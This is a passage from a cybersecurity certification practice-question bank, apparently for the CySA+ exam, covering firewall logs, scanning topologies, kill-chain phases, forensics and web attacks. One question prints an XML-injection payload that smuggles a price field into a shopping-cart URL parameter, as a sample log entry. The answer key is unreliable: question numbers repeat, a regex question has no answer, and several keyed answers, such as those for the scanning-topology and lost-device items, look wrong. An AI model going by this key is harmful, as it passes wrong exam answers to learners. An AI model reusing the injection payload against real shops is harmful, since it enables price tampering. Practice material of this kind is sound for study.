A.MAC filtering is enabled on the firewall
B. Packets are being blocked inbound to and outbound from the network
C. The packet was blocked outbound from the network
D. An attempted connection to the ssh service was prevented
E. The packet was blocking inbound to the network
F. An attempted connection to the telnet service was prevented

Answer 152

E. The packet was blocking inbound to the network
F. An attempted connection to the telnet service was prevented

Question 153

When assessing risks to your organization’s IT infrastructure, which framework allows for prioritization based on the potential impact of threats?

A. ISO 31000
B. OWASP Top 10
C. NIST’s Cybersecurity Framework
D. Center for Internet Security (CIS) Top 20 Critical Security Controls

Answer 153

C. NIST’s Cybersecurity Framework

Question 154

A cybersecurity analyst is working at a college that wants to increase its network’s security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements?

A. Combination of server-based and agent-based scanning engines
B. Passive scanning engine located at the core of the network infrastructure
C. Combination of cloud-based and server-based scanning engines
D. Active scanning engine installed on the enterprise console

Answer 154

D. Active scanning engine installed on the enterprise console

Question 154

You have been hired to investigate a possible insider threat from a user names Terri. Which of the following commands would successfully look through all the log files in ‘/var/log’ for any references to “Terri” or “terri” on a Linux server?

A. find /var/log/ -exec grep -H -e “‘terri’ OR ‘Terri’” {}\;2> /dev/null
B. find /var/log/ -name .log -exec grep -H -e “‘Terri’ OR ‘terri’” {} \;2>/dev/null
C. find /var/log/ -exec grep -H -e “[Tt]erri” {} \;2> /dev/null
D. find /var/log/ -name “.log” -exec grep -H -e “[Tt]erri” {} \;2>/dev/null

Answer 154

C. find /var/log/ -exec grep -H -e “[Tt]erri” {} \;2> /dev/null

Question 154

Ted, a file server admin, has notices that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted contacts his company’s security analyst, who verifies that the workstation’s anti-malware solution is up-to-date, and the network’s firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation?

A. Session hijacking
B. Zero-day
C. MAC spoofing
D. Impersonation

Answer 154

B. Zero-day

Question 155

You are conducting a code review of a program and observe the following calculation of 0xffffffff+1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program?

A. Password spraying
B. Integer overflow attack
C. Impersonation
D. SQL injection

Answer 155

B. Integer overflow attack

Question 156

You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement?

A. \b[192.168.66.6]+[10.66.6.10]+[172.16.66.1]\b
B. \b(192.168.66.6)+(10.66.6.10)+(172.16.66.1)\b
C. \b[192.168.66.6]|[10.66.6.10]|[172.16.66.1]\b
D. \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b

Question 156

A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following:
$ tcpdump -n -i eth015:01:35.170763 IP 10.0.19.121.52497>11.154.12.121.ssh: P 105:157(52) ack 1806 win 16549
15:01:35.170776 IP 11.154.12.121.ssh>10.0.19.121.52397: P 23988:24136(148) ack 157 win 113
15:01:35.170894 IP 11.154.12.121.ssh>10.0.19.121.52497: P 24136:24380(244) ack 157 win 113

Which statement is true?

A. 11.154.12.121 is under attack from a host at 10.0.19.121
B. 11.154.12.121 is client that is accessing an SSH server over port 52497
C. 10.0.19.121 is a client that is accessing an SSH server over port 52497
D. 10.0.19.121 is under attack from a host at 11.154.12.121

Answer 156

C. 10.0.19.121 is a client accessing an SSH served over port 52497

Question 157

You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server’s backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (Select 3)

A. Conduct a penetration test against the organization’s IP space
B. Require two-factor authentication for access to the application
C. Whitelist all specific IP blocks that use this application
D. Rename the URL to a more obscure name
E. Require an alphanumeric passphrase for the application’s default password
F. Change the username and default password

Answer 157

B. Require two-factor authentication for access to the application

C. Whitelist all specific IP blocks that use this application

F. Change the username and default password

Question 158

Which of the following provides a cryptographic authentication mechanism to positively identify an organization as the authorized sender of email for a particular domain name?

A. DKIM
B. DMARC
C. SMTP
D. SPF

Answer 158

A. DKIM

Question 159

You are going to perform a forensic disk image of a macOS laptop. What type of hard drive format should you expect to encounter?

A. exFAT
B. HFS+
C. NTFS
D. FAT32

Answer 159

B. HFS+

Hierarchical File System Plus
macOS doesn’t support FAT32 and exFAT

Question 160

You are analyzing the SIEM for your company’s e-commerce server when you notice the following URL in the logs of your SIEM:
https://www.diontraining.com/add_to_cart.php?
itemld=5”+perltemPrice=”0.00”+quantity=”100”+/>

A. SQL injection
B. Session hijacking
C. Buffer overflow
D. XML injection

Answer 160

D. XML injection

XML injection manipulated or compromises the logic of an XML application or service.

Question 161

You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the attack’s target?

A. 443
B. 389
C. 21
D. 3389

Answer 161

A. 443

Question 162

After 9 months of C++ programming, the team at Whammiedyne systems has released their new software application, Within just 2 weeks of release, though, the security team discovered multiple serious vulnerabilities in the application that must be corrected. To retrofit the source code to include the required security controls will take 2 months of labor at the cost of $100,000. Which development framework should Whammiedyne use in the future to prevent this situation from occurring in other projects?

A. DevOps
B. Waterfall Model
C. DevSecOps
D. Agile Model

Answer 162

C. DevSecOps

Question 163

Which of the following is the most important feature to consider when designing a system on a chip>

A. Space and power savings
B. Ability to interface with industrial control systems
C. Type of real-time operating system in use
D. Ability to be reconfigured after manufacture

Answer 163

A. Space and power savings

Question 164

You are a cybersecurity analyst working for an accounting firm that manages the accounting for multiple smaller firms. You have successfully detected an APT operating in your company’s network that appears to have been there for at least 8 months. In conducting a qualitative assessment of the impact, which of the following factors should be most prominently mentioned in your report to your firm’s executives? (Select 2)

A. Downtime
B. Recovery time
C. Data integrity
D. Economic
E. Detection time

Answer 164

C. Data integrity

D. Economic

Question 165

The Pass Certs Fast corporation has recently been embarrassed by several high profile data breaches. The CIO proposes improving the company’s cybersecurity posture by migrating images of all the current servers and infrastructure into a cloud-based environment. What, if any, is the flaw in moving forward with this approach?

A. This approach only changes the location of the network and not the attack surface of it
B. This is a reasonable approach that will increase the security of the servers and infrastructure
C. The company has already paid for the physical servers and will not fully realize their ROI on them due to the migration
D. This approach assumes that the cloud will provide better security than is currently done on-site

Answer 165

A. This approach only changes the location of the network and not the attack surface of it

Question 166

You have been asked to scan your company’s website using the OWASP ZAP tool. When you perform the scan, you received the following warning:
“The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved.”
You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below:

<form>
Enter your username: <br></br>
<input></input><br></br>
Enter your Password: <br></br>
<input></input><br></br>
<input></input>
</form>

Based on your analysis, what action should you take?

A. You recommend that the system admin disables SSL on the server and implements TLS instead
B. You tell the developer to review their code and implement a bug/code fix
C. You recommend that the system admin pushes out a GPO update to reconfigure the web browsers security settings
D. This is a false positive, and you should implement a scanner exception to ensure you don’t receive this again during your next scan

Answer 166

B. You tell the developer to review their code and implement a bug/code fix

Question 167

Jack is assessing the likelihood of reconnaissance activities being performed against his organization. Which of the following would best classify the likelihood of a port scan being conducted against his DMZ?

A. None
B. High
C. Medium
D. Low

Answer 167

B. High

Question 168

An organization utilizes a BYOD policy with its employees. This allows the employees to store sensitive corporate data on their personally owned devices. Which of the following occurred if an employee accidentally left their device in the back of a taxi?

A. Failed data loss prevention
B. Failed deperimeterization management
C. An advanced persistent threat
D. A data breach

Answer 168

B. Failed deperimeterization management

Question 169

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?

A. SQL injection
B. Buffer overflow
C. Denial of service
D. Cross-site scripting

Answer 169

A. SQL injection

Question 170

An organization has hired a cybersecurity analyst to conduct an assessment of their current security posture. The analyst begins by conducting an external assessment against the organization’s network to determine what information is exposed to a potential external attackers. What technique should the analyst perform first?

A. Enumeration
B. Intranet portal reviews
C. DNS query log reviews
D. Technical control audits

Answer 170

A. Enumeration

Question 171

Which of the following will an adversary do during the weaponized phase of the Lockheed Martin kill chain? (Select three)

A. Obtain a weaponizer
B. Conduct social media interactions with targeted individuals
C. Select a decoy document to present to the victim
D. Harvest email addresses
E. Select backdoor implant and appropriate command and control infrastructure for operation
F. Compromise the targets servers

Answer 171

A. Obtain weaponizer

C. Select a decoy document to present to the victim

E. Select backdoor implant and appropriate command and control infrastructure for operation

Question 172

Which of the following vulnerabilities was the MOST critical due to its high potential impact and exploitability?

A. Stagefright
B. Shellshock
C. Logjam
D. Drupalgeddon

Answer 172

B. Shellshock

Question 173

Which of the following is the difference between an incident summary report and lessons-learned report?

A. Both a lessons learned report and an incident summary report are designed for a technical audience
B. A lessons-learned report is designed for a non-technical audience
C. Both a lessons learned report and an incident summary report are designed for a non-technical audience
D. An incident summary report is designed for a non-technical audience

Answer 173

D. An incident summary report is designed for a non-technical audience

Question 174

After a sophisticated spear-phishing attack compromised your organization’s financial database, the incident response team engages in a meticulous examination of the event. They aim to preserve and scrutinize digital evidence, uncover the exact method of the breach, and gauge its impact on your organization. What is this meticulous post-incident examination known as?

A. Lessons learned
B. Incident response plan
C. Forensic analysis
D. Root cause analysis

Answer 174

C. Forensic analysis

Question 175

During an incident response, your team identified that an attacker performed a scan on your network, then delivered malware via a phishing email, which was exploited to install a backdoor on the system. The attacker then executed commands to exfiltrate data. Which framework would BEST represent this attack sequence?

A. Cyber Kill Chain
B. MITRE ATT&CK
C. OWASP Testing Guide
D. Diamond Model of Intrusion Analysis

Answer 175

A. Cyber Kill Chain